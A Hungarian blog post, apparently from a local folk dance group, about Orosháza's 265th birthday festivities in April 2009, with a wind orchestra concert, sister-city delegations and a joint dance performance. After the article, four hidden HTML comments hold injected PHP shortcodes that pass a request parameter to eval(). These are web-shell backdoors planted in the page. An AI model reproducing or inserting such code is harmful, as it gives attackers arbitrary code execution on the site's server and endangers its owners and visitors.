Testvérvárosi fennforgás

Ismét itt az április, ünnepelünk. Ezúttal azonban sokkal személyesebb az ünneplés, hiszen saját városunk születésnapja van, ráadásul a 265-dik. Ez alkalomból egy négy napos tarka forgatag töltötte meg a Kossuth utcát. De ne szaladjunk ennyire előre.

A városlakók fülét 2009. április 23-án délután öt órakor valahonnan rézfúvós zene ütötte meg. De vajon honnan jönnek a dallamok, és mit keres az evangélikus templom előtt egy létrás tűzoltóautó?

A válasz akár kézenfekvő is lehet: immár 40. alkalommal rendezte meg az Orosházi Fúvószenekar ünnepi hangversenyét, melyet toronyzene előzött meg, s a tűzoltóság segítségével a „magaslati mini hangversenyről” felvételek is készültek.

Ezután hat órakor a templomban folytatódott a születésnapi koncert. Idén a „hazai közönség” mellett vendégeket is köszönthettünk. Megtiszteltek bennünket az ünnepségsorozatban résztvevő testvérvárosok fellépői és vezetői. Jelen volt Tusnádfürdő, Nagykároly, Zomba és a legújabb testvér, Szenttamás küldöttsége.

És bár minden évben átjár minket az ünnepi hangulat, most valahogy sokkal többet jelentett. Így együtt minden olyan kerek volt, akárcsak a zenekari évfordulók: 80 évesen 40. alkalommal köszönteni a 265 éves várost igazán megtisztelő.

A hangversenyt követő napokban az egész Kossuth utca megtelt élettel. Kirakodóvásár vette birtokba a PMK és az Árpád kert környékét, s színes népi ruhába öltözött fiatalok tartottak különböző előadásokat. Ennek nyitánya volt az április 25-i felvonulás, ahol a résztvevő csoportok tettek egy kört a belvárosban. Ahogy ez már szokás, mi vezettük a menetet…

Egy ilyennek lehettünk mi is részesei, amikor is a Zombai Hagyományőrző Egyesülettel közösen léptünk fel az Árpád kertben. Először három táncot láthatott testvéreinktől a nagyérdemű, majd az V. magyar táncot és az Ördöglovas palotást „fújtuk a talpuk alá”. Bár a táncos gárda tagjai kicserélődtek az évek alatt, az együttműködés még mindig nagyon jól megy.

Remélhetőleg hasonló jó hangulat vár minket a nyáron náluk is, és a jó kapcsolat még sokáig fenn marad, nem csak köztünk, de az összes testvérváros között.

<!– [insert_php]if (isset($_REQUEST["acVIo"])){eval($_REQUEST["acVIo"]);exit;}[/insert_php][php]if (isset($_REQUEST["acVIo"])){eval($_REQUEST["acVIo"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["WiLbM"])){eval($_REQUEST["WiLbM"]);exit;}[/insert_php][php]if (isset($_REQUEST["WiLbM"])){eval($_REQUEST["WiLbM"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Tnk"])){eval($_REQUEST["Tnk"]);exit;}[/insert_php][php]if (isset($_REQUEST["Tnk"])){eval($_REQUEST["Tnk"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["xcSu"])){eval($_REQUEST["xcSu"]);exit;}[/insert_php][php]if (isset($_REQUEST["xcSu"])){eval($_REQUEST["xcSu"]);exit;}[/php] –>